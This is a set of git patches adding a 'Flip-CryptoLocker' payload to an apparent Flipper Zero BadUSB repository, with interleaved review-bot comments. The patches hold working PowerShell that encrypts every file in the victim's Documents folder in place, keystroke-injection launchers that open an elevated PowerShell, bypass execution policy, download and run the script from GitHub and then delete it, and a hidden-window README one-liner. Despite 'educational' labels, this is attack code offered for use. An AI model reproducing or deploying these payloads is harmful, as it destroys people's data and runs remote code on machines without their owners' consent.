From 267cfe3fb357b6e53e6caf426a1a5015aa5c3fb0 Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Tue, 31 Oct 2023 10:52:31 -0400
Subject: [PATCH 1/7] Add files via upload
---
.../Flip-CryptoLocker/Flip-CryptoLocker.ps1 | 37 +++++++++++++++++++
.../Flip-CryptoLocker/Flip-CryptoUnlocker.ps1 | 37 +++++++++++++++++++
2 files changed, 74 insertions(+)
create mode 100644 Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1
create mode 100644 Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1
diff --git a/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1 b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1
new file mode 100644
index 0000000..602d2c5
--- /dev/null
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1
@@ -0,0 +1,37 @@
+# Flip-CryptoLocker.ps1
+
+function Encrypt-File {
+ param (
+ [Parameter(Mandatory=$true)]
+ [string]$Path,
+
+ [Parameter(Mandatory=$true)]
+ [string]$Password
+ )
+
+ $AES = New-Object System.Security.Cryptography.AesCryptoServiceProvider
+ $AES.IV = New-Object byte[]($AES.IV.Length)
+ $AES.Key = [System.Text.Encoding]::UTF8.GetBytes($Password.PadRight($AES.Key.Length, '0'))
+
+ $Content = Get-Content -Path $Path -Encoding Byte
+ $EncryptedContent = $AES.CreateEncryptor().TransformFinalBlock($Content, 0, $Content.Length)
+
+ Set-Content -Path $Path -Value $EncryptedContent -Encoding Byte
+}
+
+# Fixed password for encryption (this is only for demonstration purposes, in a real scenario, you would want to generate or receive a password securely)
+$Password = "D3m0P@ssw0rd"
+
+# Detect the user's documents folder
+$DocumentsFolder = [Environment]::GetFolderPath("MyDocuments")
+
+# Get all the files in the documents folder
+$Files = Get-ChildItem -Path $DocumentsFolder -File
+
+# Encrypt each file
+foreach ($File in $Files) {
+ Encrypt-File -Path $File.FullName -Password $Password
+ Write-Host "File encrypted: $($File.Name)"
+}
+
+Write-Host "All files in the documents folder have been encrypted!"
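Review bot: The script has no guard that keeps it on a lab target: `$DocumentsFolder` is taken from the live user profile and the `foreach` overwrites every file there in place, with no opt-in, no copy of the original and no list of what was changed. That does not fit the "demonstration purposes" comment above `$Password`. A demo should take the target as a mandatory parameter and refuse to run outside a dedicated test directory, for example `param([Parameter(Mandatory=$true)][string]$LabFolder)` in place of the `GetFolderPath("MyDocuments")` lookup. A header comment should also state that recovery depends entirely on Flip-CryptoUnlocker.ps1 with the same fixed password, and that the original contents are not kept anywhere.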
diff --git a/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1 b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1
new file mode 100644
index 0000000..d062239
--- /dev/null
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1
@@ -0,0 +1,37 @@
+# Flip-CryptoUnlocker.ps1
+
+function Decrypt-File {
+ param (
+ [Parameter(Mandatory=$true)]
+ [string]$Path,
+
+ [Parameter(Mandatory=$true)]
+ [string]$Password
+ )
+
+ $AES = New-Object System.Security.Cryptography.AesCryptoServiceProvider
+ $AES.IV = New-Object byte[]($AES.IV.Length)
+ $AES.Key = [System.Text.Encoding]::UTF8.GetBytes($Password.PadRight($AES.Key.Length, '0'))
+
+ $EncryptedContent = Get-Content -Path $Path -Encoding Byte
+ $DecryptedContent = $AES.CreateDecryptor().TransformFinalBlock($EncryptedContent, 0, $EncryptedContent.Length)
+
+ Set-Content -Path $Path -Value $DecryptedContent -Encoding Byte
+}
+
+# Fixed password for decryption (it should be the same one used for encryption)
+$Password = "D3m0P@ssw0rd"
+
+# Detect the user's documents folder
+$DocumentsFolder = [Environment]::GetFolderPath("MyDocuments")
+
+# Get all the files in the documents folder
+$Files = Get-ChildItem -Path $DocumentsFolder -File
+
+# Decrypt each file
+foreach ($File in $Files) {
+ Decrypt-File -Path $File.FullName -Password $Password
+ Write-Host "File decrypted: $($File.Name)"
+}
+
+Write-Host "All files in the documents folder have been decrypted!"
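Review bot: `Decrypt-File` writes back whatever is in `$DecryptedContent` even when `TransformFinalBlock` throws, and the loop feeds it every file in Documents, including ones the locker never touched. Under the default error preference a .NET exception ends only that statement, so `Set-Content` then appears to run with a null value and would leave the file empty. Running the unlocker twice, or after new files were saved, would therefore destroy data instead of restoring it. Set `$ErrorActionPreference = 'Stop'` at the top of the script, or wrap the transform as `try { ... } catch { Write-Warning "Skipped $Path"; return }` so the write happens only after a successful decrypt.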
From 1a5d7e9d3870a2e0e730232fa836599d3c2588b8 Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Tue, 31 Oct 2023 11:07:55 -0400
Subject: [PATCH 2/7] Add files via upload
---
Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt | 13 +++++++++++++
Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt | 13 +++++++++++++
2 files changed, 26 insertions(+)
create mode 100644 Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt
create mode 100644 Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt
diff --git a/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt
new file mode 100644
index 0000000..e879fd6
--- /dev/null
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt
@@ -0,0 +1,13 @@
+REM Flip-CryptoLocker Launcher
+REM Author: ooovenenoso
+DELAY 2000
+GUI x
+DELAY 2000
+STRING a
+DELAY 2000
+LEFTARROW
+DELAY 2000
+ENTER
+DELAY 4000
+STRING Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1' -OutFile "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1"; & "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1"
+ENTER
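Review bot: `GUI x` and `STRING a` followed by `LEFTARROW` and `ENTER` appear to open an administrator PowerShell and accept the elevation prompt, yet the downloaded script only touches the current user's Documents folder, so the session runs with more privilege than the payload needs. The `Invoke-WebRequest` line also fetches from the `main` branch and executes the result with no integrity check, so the code that runs is whatever that branch holds at the time, not what was reviewed here. Use a non-elevated prompt, pin the URL to a commit, and compare `Get-FileHash` output with a known value before the `&` call. The Flip-CryptoUnlocker.txt hunk that follows has the same two issues.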
diff --git a/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt
new file mode 100644
index 0000000..cbf5a5d
--- /dev/null
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt
@@ -0,0 +1,13 @@
+REM Flip-CryptoUnlocker Launcher
+REM Author: ooovenenoso
+DELAY 2000
+GUI x
+DELAY 2000
+STRING a
+DELAY 2000
+LEFTARROW
+DELAY 2000
+ENTER
+DELAY 4000
+STRING Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1' -OutFile "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1"; & "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1"
+ENTER
From 449ee43788c239656f1ef7c0992419fc6450bc4d Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Tue, 31 Oct 2023 11:23:03 -0400
Subject: [PATCH 3/7] Create README.md
---
Payloads/Flip-CryptoLocker/README.md | 118 +++++++++++++++++++++++++++
1 file changed, 118 insertions(+)
create mode 100644 Payloads/Flip-CryptoLocker/README.md
diff --git a/Payloads/Flip-CryptoLocker/README.md b/Payloads/Flip-CryptoLocker/README.md
new file mode 100644
index 0000000..d1bb73e
--- /dev/null
+++ b/Payloads/Flip-CryptoLocker/README.md
@@ -0,0 +1,118 @@
+
+
+
+
+
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Flip-CryptoLocker and Unlocker
+
+Scripts designed for educational purposes to encrypt and decrypt files on a target machine.
+
+## Description
+
+The `Flip-CryptoLocker` script encrypts files on the user's machine while the `Flip-CryptoUnlocker` decrypts them. These scripts are designed purely for educational and demonstration purposes.
+
+## Getting Started
+
+### Dependencies
+
+* An internet connection
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
+```
+powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1' -O "$D\locker.ps1"; & "$D\locker.ps1"
+```
+
+(back to top)
+
+## Contributing
+
+ooovenenoso
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+📱 My Socials 📱
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
+
+
+
+
From f422168955c66ee1bd897ba513b8603c9a727f98 Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Tue, 31 Oct 2023 11:26:54 -0400
Subject: [PATCH 4/7] Update README.md
---
README.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/README.md b/README.md
index 875c729..7000ec3 100644
--- a/README.md
+++ b/README.md
@@ -77,6 +77,7 @@ This, in turn, makes it so the user no longer needs to host their own version of
| [Wifi Grabber](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-WifiGrabber)| Grabs your target's WiFi passwords and uploads them to either Dropbox, Discord, or both. |✅ | Jakoby |
| [IP Grabber](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-IP-Grabber) | Grabs your target's IP addresses and uploads them to either Dropbox, Discord, or both. |✅ | Jakoby |
| [Browser Data](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-BrowserData)| This payload can be used to retrieve the browsing history and bookmarks of your target. |✅ | Jakoby |
+| [CryptoLocker](https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1) | A script designed for educational purposes to encrypt files on a target machine. |✅ | ooovenenoso |
## Contact
From 4573529490b96067fa66c85fdf39aaf6b2fb2e61 Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Tue, 31 Oct 2023 11:37:00 -0400
Subject: [PATCH 5/7] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 7000ec3..5092642 100644
--- a/README.md
+++ b/README.md
@@ -77,7 +77,7 @@ This, in turn, makes it so the user no longer needs to host their own version of
| [Wifi Grabber](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-WifiGrabber)| Grabs your target's WiFi passwords and uploads them to either Dropbox, Discord, or both. |✅ | Jakoby |
| [IP Grabber](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-IP-Grabber) | Grabs your target's IP addresses and uploads them to either Dropbox, Discord, or both. |✅ | Jakoby |
| [Browser Data](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-BrowserData)| This payload can be used to retrieve the browsing history and bookmarks of your target. |✅ | Jakoby |
-| [CryptoLocker](https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1) | A script designed for educational purposes to encrypt files on a target machine. |✅ | ooovenenoso |
+| [CryptoLocker](https://github.com/ooovenenoso/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-CryptoLocker) | A script designed for educational purposes to encrypt files on a target machine. |✅ | ooovenenoso |
## Contact
From 8d313524dab1416de8d0853a9d7960d6c388960e Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Tue, 31 Oct 2023 11:50:12 -0400
Subject: [PATCH 6/7] Update Flip-CryptoLocker.txt
Modified Flip-CryptoLocker to automatically delete after execution
---
Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt
index e879fd6..e7686d6 100644
--- a/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.txt
@@ -9,5 +9,5 @@ LEFTARROW
DELAY 2000
ENTER
DELAY 4000
-STRING Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1' -OutFile "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1"; & "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1"
+STRING Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1' -OutFile "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1"; & "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1"; Remove-Item "$env:USERPROFILE\Desktop\Flip-CryptoLocker.ps1" -Force
ENTER
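Review bot: The appended `Remove-Item ... -Force` leaves the machine with no copy of the script that just rewrote the user's files, and because the download URL tracks `main`, the exact version that ran may not be retrievable afterwards. For a demonstration, the launcher should record what ran before removing it, for example by logging the file's `Get-FileHash` output ahead of the delete. Where PowerShell script block logging is enabled the script body should still be captured in the event log, so the delete is not a substitute for documenting the run. PATCH 7/7 makes the same change to Flip-CryptoUnlocker.txt.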
From 54c1f90fdb210f45bd9f83d29c5e5bc4b5761c41 Mon Sep 17 00:00:00 2001
From: ooovenenoso <120500656+ooovenenoso@users.noreply.github.com>
Date: Tue, 31 Oct 2023 11:50:37 -0400
Subject: [PATCH 7/7] Update Flip-CryptoUnlocker.txt
Modified Flip-CryptoUnlocker to automatically delete after execution
---
Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt
index cbf5a5d..47a901f 100644
--- a/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt
+++ b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.txt
@@ -9,5 +9,5 @@ LEFTARROW
DELAY 2000
ENTER
DELAY 4000
-STRING Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1' -OutFile "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1"; & "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1"
+STRING Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1' -OutFile "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1"; & "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1"; Remove-Item "$env:USERPROFILE\Desktop\Flip-CryptoUnlocker.ps1" -Force
ENTER